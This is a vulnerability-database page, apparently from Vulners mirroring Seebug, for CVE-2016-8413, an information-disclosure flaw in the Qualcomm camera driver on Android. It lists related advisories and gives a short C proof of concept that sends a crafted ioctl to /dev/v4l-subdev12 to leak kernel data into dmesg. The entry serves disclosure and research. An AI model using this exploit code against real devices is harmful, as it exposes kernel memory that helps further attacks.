Lucene search
K

Google Android Qualcomm Camera Driver Multiple Information Disclosure Vulnerabilities(CVE-2016-8413)

🗓️ 04 Apr 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 41 Views

Google Android Qualcomm Camera Driver Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Android Security Bulletins
Android Security Bulletin—March 2017Stay organized with collectionsSave and categorize content based on your preferences.
6 Mar 201700:00
androidsecurity
CNVD
Google Android Qualcomm Camera Driver Information Disclosure Vulnerability
10 Mar 201700:00
cnvd
CVE
CVE-2016-8413
8 Mar 201701:00
cve
Cvelist
CVE-2016-8413
8 Mar 201701:00
cvelist
EUVD
EUVD-2016-9261
7 Oct 202500:30
euvd
NVD
CVE-2016-8413
8 Mar 201701:59
nvd
OSV
CVE-2016-8413
8 Mar 201701:59
osv
OSV
UBUNTU-CVE-2016-8413
8 Mar 201701:59
osv
Prion
Information disclosure
8 Mar 201701:59
prion
UbuntuCve
CVE-2016-8413
8 Mar 201701:59
ubuntucve
Rows per page

                                                #include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/videodev2.h>
#include <linux/types.h>

struct msm_camera_v4l2_ioctl_t {
	uint32_t id;
	size_t len;
	int32_t trans_code;
	void __user *ioctl_ptr;
};

#define VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO \
	_IOWR('V', BASE_VIDIOC_PRIVATE + 7, struct msm_camera_v4l2_ioctl_t)

int main(void)
{
	int fd;
	int ret;
	struct msm_camera_v4l2_ioctl_t request = { 0 };
	
	uint32_t identity = 0xAAAAAAAA;
	
	request.len = 1;
	request.ioctl_ptr = &identity;

	fd = open("/dev/v4l-subdev12", O_RDWR);

	if (fd < 0) {
		printf("Couldn't open msm_cpp, reason: %s\n", strerror(errno));
		exit(-1);
	}

	ret = ioctl(fd, VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO, &request);
	
	close(fd);

	printf("Success! Check dmesg for 'identity' value...\n");

	// system("dmesg | grep -i \"error finding buffer queue entry for identity:\"");
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2017 00:00Current
5.9Medium risk
Vulners AI Score5.9
EPSS0.00283
41